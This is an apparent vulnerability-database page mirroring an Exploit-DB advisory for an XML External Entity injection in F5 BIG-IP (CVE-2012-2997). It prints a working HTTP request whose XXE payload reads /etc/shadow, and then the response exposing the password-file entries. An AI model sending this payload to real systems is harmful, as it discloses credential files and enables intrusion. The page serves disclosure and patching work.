Lucene search
+L

F5 Networks BIG-IP - XML External Entity Injection

🗓️ 21 Jan 2013 00:00:00Reported by anonymousType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

F5 Networks BIG-IP XML External Entity Injection vulnerability allows attackers to obtain sensitive information from local files and carry out other attacks

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2012-2997
21 Jan 201300:00
circl
cve
CVE
CVE-2012-2997
21 Jan 201418:00
cve
cvelist
Cvelist
CVE-2012-2997
21 Jan 201418:00
cvelist
euvd
EUVD
EUVD-2012-2975
7 Oct 202500:30
euvd
nvd
NVD
CVE-2012-2997
21 Jan 201418:55
nvd
packetstorm
Packet Storm
F5 BIG-IP 11.2.0 XML External Entity Injection
22 Jan 201300:00
packetstorm
prion
Prion
Xxe
21 Jan 201418:55
prion
securityvulns
securityvulns
SEC Consult SA-20130122-0 :: F5 BIG-IP XML External Entity Injection vulnerability
27 Jan 201300:00
securityvulns
securityvulns
securityvulns
F5 BIG-IP security vulnerabilities
27 Jan 201300:00
securityvulns
f5
F5 Networks
SOL14138 - XML External Entity Injection (XXE) from authenticated source vulnerability CVE-2012-2997
21 Jan 201300:00
f5
source: https://www.securityfocus.com/bid/57496/info

F5 Networks BIG-IP is prone to an XML External Entity injection vulnerability.

Attackers can exploit this issue to obtain potentially sensitive information from local files on computers running the vulnerable application and to carry out other attacks.

POST /sam/admin/vpe2/public/php/server.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 143

<?xml  version="1.0" encoding='utf-8' ?>
<!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]>
<message><dialogueType>&e;</dialogueType></message>


The response includes the content of the file:

<?xml version="1.0" encoding="utf-8"?>
<message><dialogueType>any</dialogueType><status>generalError</status><command>any</command><accessPolicyName>any</accessPolicyName><messageBody><generalErrorText>Client
has sent unknown dialogueType '
root:--hash--:15490::::::
bin:*:15490::::::
daemon:*:15490::::::
adm:*:15490::::::
lp:*:15490::::::
mail:*:15490::::::
uucp:*:15490::::::
operator:*:15490::::::
nobody:*:15490::::::
tmshnobody:*:15490::::::
admin:--hash--:15490:0:99999:7:::

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Sep 2015 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24
EPSS0.06443
33